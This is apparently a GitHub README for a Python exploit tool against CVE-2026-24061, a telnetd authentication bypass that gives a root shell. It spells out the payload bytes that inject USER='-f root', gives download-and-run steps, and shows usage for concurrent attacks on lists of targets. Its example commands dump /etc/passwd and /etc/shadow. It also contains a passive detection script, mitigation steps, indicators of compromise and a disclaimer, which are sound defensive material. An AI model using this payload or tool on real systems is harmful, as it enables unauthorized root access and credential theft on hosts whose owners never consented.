A security research tool for exploiting CVE-2026-24061, a critical remote authentication bypass vulnerability in GNU inetutils-telnetd that allows instant root shell access without authentication.
- Vulnerability Summary
- Affected Versions
- Technical Analysis
- Prerequisites
- Installation
- Usage
- Output Reference
- Exploitation Methodology
- Mitigation and Remediation
- Indicators of Compromise
- Legal Disclaimer
- References
- Credits
## Vulnerability Summary

| Field | Value |
|---|---|
| CVE Identifier | CVE-2026-24061 |
| CVSS v3.1 Score | 9.8 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE Classification | CWE-88: Improper Neutralization of Argument Delimiters in a Command |
| Vendor | GNU Project |
| Product | inetutils-telnetd |
| Disclosure Date | January 20, 2026 |
| Patch Available | TBD |
A critical vulnerability exists in GNU inetutils-telnetd through version 2.7 that allows unauthenticated remote attackers to bypass authentication entirely and gain immediate root shell access. The vulnerability is exploited through the NEW_ENVIRON telnet option by injecting a specially crafted USER environment variable with the value "-f root", which bypasses all authentication mechanisms.
- Confidentiality: Complete compromise of system data
- Integrity: Full system control with root privileges
- Availability: Potential for complete system takeover or denial of service
- Scope: Unchanged (S:U) - the impacted component is the same host that runs the vulnerable telnet service
## Affected Versions

| Version Range | Status |
|---|---|
| <= 2.7 | Vulnerable |
| > 2.7 | Patch Status TBD |
## Technical Analysis

The vulnerability originates from improper validation of the USER environment variable in the telnetd NEW_ENVIRON option handler. When processing the NEW_ENVIRON telnet option, the telnetd service fails to sanitize the USER variable value before passing it to the login process. By setting USER to "-f root", the attacker injects command-line arguments that force the authentication to succeed for the root user without requiring credentials.

Attack flow:
- Attacker connects to the telnetd service (typically port 23)
- During telnet option negotiation, the server requests NEW_ENVIRON data
- Attacker responds with USER environment variable set to "-f root"
- The malicious argument bypasses authentication checks
- Instant root shell is granted without any password prompt
- Full system compromise is achieved
- Prerequisites: Network access to target telnetd service
- Authentication: Not required
- User Interaction: None
- Attack Complexity: Low
## Prerequisites

- Python 3.7 or higher
- Network connectivity to target telnetd instance(s)
- Sufficient permissions to execute Python scripts
All dependencies are part of Python's standard library:
| Package | Purpose |
|---|---|
| socket | Network communication |
| select | I/O multiplexing |
| sys | System interaction |
| os | Operating system interface |
| threading | Concurrent target exploitation |
| datetime | Timestamp formatting |
## Installation

Method 1: clone the repository

```bash
# Clone the repository
git clone https://github.com/SystemVll/CVE-2026-24061.git
cd CVE-2026-24061

# Run the exploit
python3 main.py -u <target_ip>
```

Method 2: download the script only

```bash
# Download the exploit
curl -O https://raw.githubusercontent.com/SystemVll/CVE-2026-24061/main/main.py

# Make it executable (Linux/macOS)
chmod +x main.py

# Run the exploit
python3 main.py -u <target_ip>
```

Method 3: run with an existing Python installation

```bash
# Ensure Python 3.7+ is installed
python3 --version

# Download and run
python3 main.py -u <target_ip>
```

## Usage

```text
Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u     Single target IP address or hostname
    -l     Path to file containing target IPs (one per line)
    -p     Target port (default: 23)
    -usr   User to exploit as (default: root)
```
Exploit a single telnetd instance:

```bash
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100

# Custom port
python3 main.py -u 192.168.1.100 -p 2323

# Different user
python3 main.py -u 192.168.1.100 -usr admin
```

Execute commands non-interactively:

```bash
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100
```

Exploit multiple targets from a file:

```bash
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin
```

Target File Format (targets.txt):

```text
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com
```

Notes:
- One target per line
- IP addresses or hostnames
- Empty lines are ignored
- Targets are exploited concurrently using threading
## Output Reference

| Indicator | Color | Description |
|---|---|---|
| [SUCCESS] | Green | Successfully connected to target |
| [EXPLOIT] | Green | Exploitation payload sent successfully |
| [INFO] | Blue | Informational message about current operation |
| [ERROR] | Red | Connection failure, timeout, or exploitation error |
| [WARNING] | Yellow | Warning message (not currently used) |

Example session:

```text
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass            ║
║                                                               ║
║ CVSS Score: 9.8 (Critical)                                    ║
║ Impact: Remote Authentication Bypass - Instant Root Shell     ║
║                                                               ║
║ This tool is part of the HGrab Framework.                     ║
╚═══════════════════════════════════════════════════════════════╝
[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
```
## Exploitation Methodology

The exploit leverages the telnet protocol negotiation phase:
- Initial Connection: TCP connection established to target port
- Option Negotiation: Server sends DO/WILL commands for various telnet options
- TTYPE Agreement: Client agrees to send terminal type (WILL TTYPE)
- TSPEED Agreement: Client agrees to send terminal speed (WILL TSPEED)
- NEW_ENVIRON Agreement: Client agrees to send environment variables (WILL NEW_ENVIRON)
- Subnegotiation: Server requests environment variables (SB NEW_ENVIRON SEND)
- Payload Injection: Client sends USER="-f root" in NEW_ENVIRON response
- Authentication Bypass: Server processes malicious USER variable
- Shell Access: Root shell granted without authentication
Payload construction:

```python
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39
payload = bytes([
    255,  # IAC
    250,  # SB
    39,   # NEW_ENVIRON
    0,    # IS
    0,    # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([  # 1 = VALUE
    255,  # IAC
    240,  # SE
])
```

Tool implementation notes:

- Input Multiplexing: Uses `select.select()` for simultaneous socket and stdin monitoring
- Non-blocking I/O: Socket configured for non-blocking operations
- Telnet Processing: IAC sequences stripped from output for clean display
- Timeout Management: 30-second timeout for command execution
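As an added defensive example (not part of this repository), the following Python decodes NEW-ENVIRON subnegotiations from a captured client-to-server telnet stream and flags any variable whose value begins with a dash, the argument-injection shape described above; the option codes are those of RFC 1572, and the sample bytes are constructed here from the payload layout shown in this section.

```python
# Added example, not the repository's code: a passive detector for the NEW-ENVIRON
# argument-injection pattern above, run over a client->server telnet capture. It
# decodes NEW-ENVIRON IS/INFO subnegotiations (RFC 1572) and flags values starting "-".
IAC, SB, SE = 255, 250, 240
NEW_ENVIRON, IS, INFO = 39, 0, 2
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

def _decode_pairs(body: bytes):
    # Split an IS/INFO body into (name, value) pairs; ESC quotes the following byte.
    fields, j = [], 0                               # [(is_name, bytearray)]
    while j < len(body):
        b = body[j]
        if b == ESC and j + 1 < len(body):
            if fields: fields[-1][1].append(body[j + 1])
            j += 2
            continue
        if b in (VAR, USERVAR, VALUE):
            fields.append((b != VALUE, bytearray()))  # VAR/USERVAR start a name
        elif fields:
            fields[-1][1].append(b)
        j += 1
    pairs = []
    for k, (is_name, data) in enumerate(fields):
        if is_name:
            has_val = k + 1 < len(fields) and not fields[k + 1][0]
            value = fields[k + 1][1].decode("latin-1") if has_val else ""
            pairs.append((data.decode("latin-1"), value))
    return pairs

def parse_new_environ(stream: bytes):
    # Return [(name, value)] for every NEW-ENVIRON IS/INFO block in the stream.
    pairs, i = [], 0
    while i + 1 < len(stream):
        if stream[i] != IAC or stream[i + 1] != SB:
            i += 1
            continue
        body, i = bytearray(), i + 2
        while i + 1 < len(stream) and not (stream[i] == IAC and stream[i + 1] == SE):
            body.append(stream[i])
            i += 2 if stream[i] == IAC else 1        # IAC IAC encodes one 0xFF data byte
        i += 2                                       # skip IAC SE
        if len(body) >= 2 and body[0] == NEW_ENVIRON and body[1] in (IS, INFO):
            pairs.extend(_decode_pairs(bytes(body[2:])))
    return pairs

def flag_option_injection(stream: bytes):
    # Variables whose value login(1) would parse as a command-line option.
    return [(n, v) for n, v in parse_new_environ(stream) if v.lstrip().startswith("-")]
# Constructed sample: WILL NEW_ENVIRON followed by the payload shown in this section.
SAMPLE = bytes([255, 251, 39, 255, 250, 39, 0, 0]) + b"USER" + bytes([1]) + b"-f root" + bytes([255, 240])
```

Running `flag_option_injection(SAMPLE)` returns `[('USER', '-f root')]`, while a normal session that sends `USER=alice` returns an empty list; the same function can be pointed at the reassembled client side of a telnet flow from a packet capture.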
## Mitigation and Remediation

Immediate actions:

- Disable telnetd: Stop and disable the telnetd service immediately

  ```bash
  # systemd-based systems
  sudo systemctl stop telnetd
  sudo systemctl disable telnetd

  # xinetd-based systems
  sudo service xinetd stop
  sudo chkconfig telnet off
  ```

- Firewall Rules: Block telnet port (23) at the firewall level

  ```bash
  # iptables (-A appends; use -I INPUT 1 instead if an earlier rule already accepts port 23)
  sudo iptables -A INPUT -p tcp --dport 23 -j DROP

  # firewalld
  sudo firewall-cmd --permanent --remove-service=telnet
  sudo firewall-cmd --reload
  ```

- Network Isolation: Remove telnet service from internet-facing systems
  - Use internal network segments only
  - Implement network access control lists (ACLs)
| Action | Priority | Description |
|---|---|---|
| SSH Migration | Critical | Replace telnet with SSH for remote access |
| Patch Management | Critical | Monitor for and apply security updates |
| Service Audit | High | Identify and disable unnecessary network services |
| Network Segmentation | High | Isolate critical systems from public networks |
| Intrusion Detection | Medium | Deploy IDS/IPS to detect exploitation attempts |
| Access Control | Medium | Implement IP whitelisting for remote services |
Use SSH instead of Telnet:

```bash
# Install OpenSSH server
sudo apt-get install openssh-server   # Debian/Ubuntu
sudo yum install openssh-server       # RHEL/CentOS

# Enable and start SSH
sudo systemctl enable sshd
sudo systemctl start sshd
```

Verify that telnetd is no longer listening:

```bash
# Verify telnetd is not running
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23
# Should return no results if properly disabled
```

## Indicators of Compromise

Review system logs for the following patterns:
Authentication Logs:

```bash
# Check for unusual login patterns
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure

# Look for suspicious USER environment variables
sudo grep "USER.*-f" /var/log/auth.log
```

Network Logs:
- Telnet connections from unexpected IP addresses
- Connections to port 23 outside normal operating hours
- Multiple rapid connections to telnet service

Host Indicators:
- Unexpected processes running as root
- Modified system configuration files
- Unauthorized user accounts
- New SSH keys in /root/.ssh/authorized_keys
- Suspicious cron jobs or scheduled tasks

Post-Compromise Network Activity:
- Outbound connections from the telnet service process
- Data exfiltration to external hosts
- Reverse shell connections
- Port scanning activity originating from compromised system
- Lateral movement attempts to other internal systems
Investigation commands:

```bash
# Check for active telnet connections
sudo netstat -antp | grep :23

# Review recent root logins
sudo last | grep root

# Check for modified system files
sudo rpm -Va      # RHEL/CentOS
sudo debsums -c   # Debian/Ubuntu

# List processes by root
sudo ps aux | grep root

# Check for unauthorized SSH keys
sudo cat /root/.ssh/authorized_keys
```

## Legal Disclaimer

IMPORTANT: READ BEFORE USE
This tool is provided strictly for:
- Authorized security assessments and penetration testing
- Educational and research purposes in controlled environments
- Defensive security operations with proper authorization
- Vulnerability assessment of systems you own or have explicit permission to test
Prohibited Uses:
- Unauthorized access to computer systems or networks
- Exploitation of systems without explicit written consent from the owner
- Any activity that violates local, state, federal, or international laws
- Malicious activities or unauthorized system compromise
Liability: The authors, contributors, and distributors of this software assume NO responsibility or liability for misuse, damage, or illegal activities conducted with this tool. Users are solely responsible for:
- Ensuring compliance with all applicable laws and regulations
- Obtaining proper authorization before conducting security testing
- Any consequences resulting from the use or misuse of this software
Legal Notice: Unauthorized access to computer systems is a serious criminal offense. Violations may result in prosecution under:
- Computer Fraud and Abuse Act (CFAA) - United States (18 U.S.C. § 1030)
- Computer Misuse Act 1990 - United Kingdom
- European Union Directive on Attacks against Information Systems
- Similar legislation in other jurisdictions worldwide
Penalties may include imprisonment, substantial fines, and civil liability.
By using this tool, you acknowledge that you have read, understood, and agree to comply with this disclaimer and all applicable laws.
## References

- NVD - CVE-2026-24061
- MITRE CVE Record
- OpenWall Disclosure (Jan 20, 2026)
- OpenWall Discussion (Jan 20, 2026)
- OpenWall Update (Jan 22, 2026)
- CWE-88: Improper Neutralization of Argument Delimiters
- Telnet Protocol Specification (RFC 854)
- Telnet Environment Option (RFC 1408)
- OWASP Command Injection
## Credits

- Exploit Author: IRIS C2 Team
- Framework: Part of the HGrab Framework
- Discovery: Security Research Community
- Disclosure: OpenWall mailing list contributors
| Version | Date | Changes |
|---|---|---|
| 1.0.0 | 2026-01-23 | Initial release |
For questions, issues, or contributions:
- Issues: Report bugs or request features via GitHub Issues
- Security: Report vulnerabilities responsibly to the maintainers
- Contributions: Pull requests are welcome
This project is provided as-is for authorized security research and educational purposes only. No warranty is provided, express or implied. Use at your own risk and in accordance with all applicable laws and regulations.
USE ONLY WITH PROPER AUTHORIZATION